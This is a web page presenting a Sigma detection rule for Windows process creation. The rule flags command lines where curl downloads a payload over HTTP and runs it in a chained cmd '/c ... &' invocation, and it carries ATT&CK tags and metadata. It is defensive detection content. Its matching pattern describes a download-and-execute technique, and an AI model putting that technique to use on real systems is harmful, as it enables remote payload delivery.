Curl Download And Execute Combination

calendarMar 7, 2023 · attack.execution attack.t1218 attack.command_and_control attack.t1105  ·
Share on: linkedincopy

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

Sigma rule (View on GitHub)

 1title: Curl Download And Execute Combination
 2id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288
 3status: test
 4description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
 5references:
 6    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link
 7author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
 8date: 2020/01/13
 9modified: 2023/03/06
10tags:
11    - attack.execution
12    - attack.t1218
13    - attack.command_and_control
14    - attack.t1105
15logsource:
16    category: process_creation
17    product: windows
18detection:
19    selection:
20        CommandLine|contains|all:
21            - ' /c '
22            - 'curl '
23            - 'http'
24            - '-o'
25            - '&'
26    condition: selection
27fields:
28    - ParentImage
29    - CommandLine
30falsepositives:
31    - Unknown
32level: high

Related rules

to-top